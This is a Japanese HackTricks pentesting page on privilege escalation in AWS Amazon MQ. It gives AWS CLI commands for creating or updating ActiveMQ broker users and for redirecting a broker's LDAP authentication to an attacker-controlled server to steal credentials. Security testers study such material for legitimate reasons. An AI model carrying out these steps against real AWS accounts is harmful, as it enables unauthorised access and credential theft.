AWS - MQ Privesc

HackTricksをサポートする

MQ

MQに関する詳細情報は以下を確認してください:

mq:ListBrokers, mq:CreateUser

これらの権限を持つと、ActiveMQブローカーに新しいユーザーを作成できます(これはRabbitMQでは機能しません):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

潜在的な影響: ActiveMQを通じて機密情報にアクセスする

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

これらの権限を持つことで、ActiveMQブローカーに新しいユーザーを作成することができます(これはRabbitMQでは機能しません):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

潜在的な影響: ActiveMQを通じて機密情報にアクセスする

mq:ListBrokers, mq:UpdateBroker

ブローカーがActiveMQLDAPを使用して認証を行っている場合、攻撃者が制御するものLDAPサーバーの設定変更することが可能です。これにより、攻撃者はLDAPを通じて送信されるすべての資格情報を盗むことができます。

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

もしActiveMQで使用されている元の認証情報を何らかの方法で見つけることができれば、MitMを実行し、認証情報を盗み、元のサーバーでそれを使用し、レスポンスを送信することができる(おそらく盗まれた認証情報を再利用するだけでこれを行うことができる)。

潜在的な影響: ActiveMQの認証情報を盗む

HackTricksをサポートする

Last updated